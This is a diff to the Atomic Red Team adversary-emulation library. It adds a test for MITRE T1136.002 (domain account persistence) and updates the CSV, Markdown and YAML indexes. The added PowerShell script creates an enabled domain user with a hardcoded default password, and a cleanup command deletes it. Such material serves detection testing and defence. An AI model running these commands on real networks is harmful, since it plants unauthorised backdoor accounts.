diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 99e74211..587975b9 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -125,6 +125,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
+persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index cc4d262a..036c16ce 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -348,6 +348,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
+persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 1d2baaf6..a5b8b9cf 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -249,6 +249,7 @@
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
+ - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e790f09c..de725c5f 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -630,6 +630,7 @@
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
+ - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e79f7cb0..acdfb3e2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -11752,6 +11752,43 @@ persistence:
'
name: command_prompt
elevation_required: false
+ - name: Create a new Domain Account using PowerShell
+ auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7
+ description: 'Creates a new Domain User using the credentials of the Current
+ User
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ username:
+ description: Name of the Account to be created
+ type: String
+ default: T1136.002_Admin
+ password:
+ description: Password of the Account to be created
+ type: String
+ default: T1136_pass123!
+ executor:
+ command: |
+ $SamAccountName = '#{username}'
+ $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
+ Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+ $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+ $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
+ $User.SamAccountName = $SamAccountName
+ $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+ $User.SetPassword($TempCred.GetNetworkCredential().Password)
+ $User.Enabled = $True
+ $User.PasswordNotRequired = $False
+ $User.DisplayName = $SamAccountName
+ $User.Save()
+ $User
+ cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
+
+'
+ name: powershell
+ elevation_required: false
T1078.002:
technique:
external_references:
diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md
index c3029be0..cf70f9c5 100644
--- a/atomics/T1136.002/T1136.002.md
+++ b/atomics/T1136.002/T1136.002.md
@@ -10,6 +10,8 @@ Such accounts may be used to establish secondary credentialed access that do not
- [Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON](#atomic-test-2---create-a-new-account-similar-to-anonymous-logon)
+- [Atomic Test #3 - Create a new Domain Account using PowerShell](#atomic-test-3---create-a-new-domain-account-using-powershell)
+
@@ -80,4 +82,50 @@ net user "#{username}" >nul 2>&1 /del /domain
+
+
+
+## Atomic Test #3 - Create a new Domain Account using PowerShell
+Creates a new Domain User using the credentials of the Current User
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Name of the Account to be created | String | T1136.002_Admin|
+| password | Password of the Account to be created | String | T1136_pass123!|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$SamAccountName = '#{username}'
+$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
+Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
+$User.SamAccountName = $SamAccountName
+$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+$User.SetPassword($TempCred.GetNetworkCredential().Password)
+$User.Enabled = $True
+$User.PasswordNotRequired = $False
+$User.DisplayName = $SamAccountName
+$User.Save()
+$User
+```
+
+#### Cleanup Commands:
+```powershell
+net user "#{username}" >nul 2>&1 /del /domain
+```
+
+
+
+
+